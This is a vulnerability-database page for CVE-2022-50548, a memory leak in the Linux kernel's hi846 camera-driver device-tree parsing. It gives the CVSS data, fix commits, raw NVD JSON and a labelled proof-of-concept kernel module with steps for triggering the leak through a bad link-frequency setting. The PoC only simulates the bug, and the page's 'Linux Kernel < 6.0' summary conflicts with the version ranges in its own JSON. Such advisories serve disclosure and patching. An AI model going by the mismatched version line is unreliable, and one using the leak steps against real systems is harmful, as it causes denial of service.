Security Vulnerability Report
CVE-2022-50548 CVSS 5.5 MEDIUM

CVE-2022-50548

Published: 2025-10-07 16:15:40
Last Modified: 2026-02-26 23:17:36
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

media: i2c: hi846: Fix memory leak in hi846_parse_dt()

If any of the checks related to the supported link frequencies fail, then the V4L2 fwnode resources don't get released before returning, which leads to a memleak. Fix this by properly freeing the V4L2 fwnode data in a designated label.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.0 (all affected versions that include the hi846 driver)
Fix commit: 4368730678412a8fa71960dbda81e122dafa70f7
Fix commit: 80113026d415e27483669db7a88b548d1ec3d3d1
Fix commit: a05a9ae9ef3fffc9bc7ec2bc432a249a01155f6e

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2022-50548 - Linux Kernel hi846 driver memory leak PoC
 *
 * This PoC demonstrates how to trigger the memory leak by
 * loading the hi846 driver with an unsupported link frequency
 * configured in the device tree.
 *
 * Note: Actual exploitation requires modifying the device tree
 * to specify a link frequency not supported by the hi846 sensor.
 */
#include <linux/module.h>
#include <linux/i2c.h>
#include <linux/of.h>
#include <linux/init.h>
#include <linux/slab.h>        /* kmalloc(), kfree() */
#include <media/v4l2-fwnode.h> /* struct v4l2_fwnode_endpoint */

/*
 * Simulate the vulnerable code path in hi846_parse_dt().
 * Not called from module init; kept as an illustration of the leak.
 */
static int __maybe_unused trigger_leak(struct i2c_client *client)
{
	struct v4l2_fwnode_endpoint ep = {0};

	/* Step 1: Allocate fwnode endpoint resources (simulated) */
	ep.link_frequencies = kmalloc(sizeof(u64) * 4, GFP_KERNEL);
	if (!ep.link_frequencies)
		return -ENOMEM;
	ep.nr_of_link_frequencies = 4;
	ep.link_frequencies[0] = 9999999; /* Unsupported frequency */

	/* Step 2: Check fails because frequency is not supported */
	if (ep.link_frequencies[0] != 448000000 &&
	    ep.link_frequencies[0] != 896000000) {
		/* BUG: Missing v4l2_fwnode_endpoint_free(&ep) here */
		return -EINVAL; /* Memory leak occurs */
	}

	/* Normal cleanup - never reached in vulnerable path */
	kfree(ep.link_frequencies);
	return 0;
}

static int __init hi846_leak_init(void)
{
	pr_info("CVE-2022-50548 PoC: Triggering memory leak\n");
	/*
	 * In real scenario, modify device tree link-frequency property
	 * to an unsupported value and load the hi846 driver module
	 */
	return 0;
}

static void __exit hi846_leak_exit(void)
{
	pr_info("CVE-2022-50548 PoC: Unloaded\n");
}

module_init(hi846_leak_init);
module_exit(hi846_leak_exit);

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("PoC for CVE-2022-50548 hi846 memory leak");

/*
 * To actually trigger this vulnerability:
 * 1. Modify the device tree entry for the hi846 sensor
 * 2. Set the 'link-frequencies' property to an unsupported value
 *    (e.g., <100000000>)
 * 3. Reboot or reload the hi846 driver
 * 4. Observe memory leak via /proc/meminfo or kmemleak
 *
 * Each failed probe attempt will leak the allocated fwnode structure.
 */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50548", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:39.620", "lastModified": "2026-02-26T23:17:36.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: i2c: hi846: Fix memory leak in hi846_parse_dt()\n\nIf any of the checks related to the supported link frequencies fail, then\nthe V4L2 fwnode resources don't get released before returning, which leads\nto a memleak. Fix this by properly freeing the V4L2 fwnode data in a\ndesignated label."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4368730678412a8fa71960dbda81e122dafa70f7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/80113026d415e27483669db7a88b548d1ec3d3d1", 
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a05a9ae9ef3fffc9bc7ec2bc432a249a01155f6e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}